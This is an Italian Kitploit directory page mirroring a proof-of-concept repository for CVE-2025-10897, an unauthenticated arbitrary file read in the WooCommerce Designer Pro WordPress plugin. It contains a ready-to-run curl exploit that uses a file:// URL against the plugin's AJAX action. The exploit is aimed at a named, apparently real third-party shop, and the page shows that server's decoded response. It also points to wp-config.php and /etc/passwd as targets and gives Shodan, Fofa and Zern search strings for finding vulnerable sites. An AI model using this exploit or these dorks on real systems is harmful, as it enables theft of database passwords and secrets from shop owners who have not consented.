Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-10897 — WooCommerce Designer Pro <= 1.9.28 - Lettura arbitraria di file senza autenticazione | Kitploit
Strumenti/GitHubGitHub/error-inside/cve-2025-10897
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiRaccolta InformazioniSicurezza WebPenetration Testing
GitHuberror-inside/cve-2025-10897

CVE-2025-10897

WooCommerce Designer Pro <= 1.9.28 - Lettura arbitraria di file senza autenticazione

Vedi Repository
31 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-10897

Python CVSS License Educational

WooCommerce è un plugin di e-commerce open-source per WordPress che trasforma i siti web in negozi online. WooCommerce Designer Pro è un plugin WordPress sviluppato da JMA Plugins che consente ai clienti di progettare e personalizzare i prodotti direttamente sui negozi WooCommerce.

IMPORTANTE: WooCommerce e WooCommerce Designer Pro sono completamente diversi.

WooCommerce Designer Pro supporta la creazione di biglietti da visita, cartoline, volantini, manifesti, magliette, adesivi e altri materiali stampabili con funzionalità come il supporto ai colori CMYK, la generazione di PDF e un'interfaccia di progettazione basata su canvas. Il plugin si integra con WooCommerce per consentire la personalizzazione del prodotto in tempo reale prima dell'acquisto, rendendolo adatto ad attività di stampa online e negozi di articoli personalizzati.

CVE-2025-10897 è una lettura arbitraria di file senza autenticazione in WooCommerce Designer Pro versioni fino alla 1.9.28 (CWE-22). Un attaccante invia con e un URL che punta a file del server come o . Il plugin restituisce il contenuto del file nella risposta JSON. Ciò può esporre password del database e altri segreti da senza alcun account WordPress.

POST /wp-admin/admin-ajax.php
action=wcdp_convert_resource_cmyk
file://
/etc/passwd
wp-config.php
wp-config.php

PoC

RICHIESTA

root@kitploit:~
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: */*' \
  -H 'Connection: close' \
  -d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'

RISPOSTA

root@kitploit:~
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}

Risposta decodificata in Base64:

root@kitploit:~
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"

ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01

Utilizzo

root@kitploit:~
python CVE-2025-10897-X7.py

NOTA: Il nostro script PoC tenta di ottenere wp-config.php ma il target potrebbe avere installato WordPress in una posizione diversa da /var/www.

Argomenti per cercare server vulnerabili

  • Zern : body:"wc-designer-pro"
  • Fofa : body="wc-designer-pro"
  • Shodan : http.body:"wc-designer-pro"

Risorse

  • OpenCVE - WooCommerce Designer Pro <= 1.9.28 Lettura arbitraria di file senza autenticazione
  • NIST - Dettaglio CVE-2025-10897
  • Homepage di WooCommerce
  • WooCommerce Designer Pro - Sito ufficiale degli sviluppatori
  • WooCommerce Designer Pro - Marketplace ufficiale
  • Nuclei Templated - CVE-2025-10897

Dichiarazione di non responsabilità

Questa repository e i suoi contenuti sono forniti esclusivamente per ricerca di sicurezza legittima, test di penetrazione autorizzati, studio didattico e scopi difensivi. Accedendo o utilizzando questo materiale, riconosci la piena responsabilità di garantire che le tue attività siano conformi a tutte le leggi applicabili e di aver ottenuto la dovuta autorizzazione prima di testare o applicare queste tecniche su qualsiasi sistema che non possiedi.

Gli autori e i manutentori di questo progetto non si assumono alcuna responsabilità per eventuali danni, conseguenze legali o usi impropri derivanti dall'applicazione di queste informazioni. Qualsiasi uso per accesso non autorizzato, attività dannosa o scopi illegali è espressamente vietato e non supportato.

Usa in modo responsabile. Resta legale. Testa solo ciò che possiedi o per cui hai esplicita autorizzazione scritta.

Autori

  • ErrorInside // SCT

Licenza

SCT-PL

Scarica lo strumento